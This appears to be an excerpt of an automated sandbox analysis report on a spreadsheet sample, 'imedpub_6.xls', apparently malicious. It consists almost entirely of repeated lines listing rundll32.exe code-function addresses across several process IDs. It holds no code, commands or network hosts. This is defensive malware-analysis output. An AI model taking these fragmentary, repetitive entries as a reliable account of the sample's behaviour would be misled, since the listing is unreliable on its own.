                            Source: imedpub_6.xlsInitial sample: EXEC
                            Source: imedpub_6.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00339011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00340001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00332051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003370B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003420BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003381B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003351BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00332251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00335361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00334346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003513AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003364E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00342550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00335548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003495FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003466CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00337735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00339714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00334816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00341889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00338969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003509B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003359F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00331A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00338B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00340B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00339B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00332BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00337C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00333C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00334C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00336D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00339DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00333E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00335E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00340E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00334EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0033DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00337FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CD6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D4116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D95FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D8606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C1A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D0E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D1889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DDEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D66CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D5CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DDCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D8519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D0B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DBB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DCB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D2550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CCF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C8969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DE395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D4B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001C9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001CDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DDBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00359011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00360001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00370056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00352051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003570B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003620BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00364116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003581B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003551BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00352251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00355361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00354346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003713AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003564E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00368519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00362550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00355548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003695FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00368606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003666CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00357735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00359714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00354816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00361889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00358969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003709B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003559F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00351A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00358B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00360B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00367BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00364B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00359B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00368BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00352BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00369BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00357C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00353C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00370C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00354C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00366C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00365CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00356D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00366DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00367DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00359DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00353E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00370E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00355E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00360E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00354EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00369EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0036DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00370F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0035DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00357FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BD6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C4116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C95FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CF435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C8606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B1A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C0E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C6C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C1889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CDCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C9EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CDEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C66CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C5CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003D0F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003CBB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C8519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003C0B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003BBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_003B8969
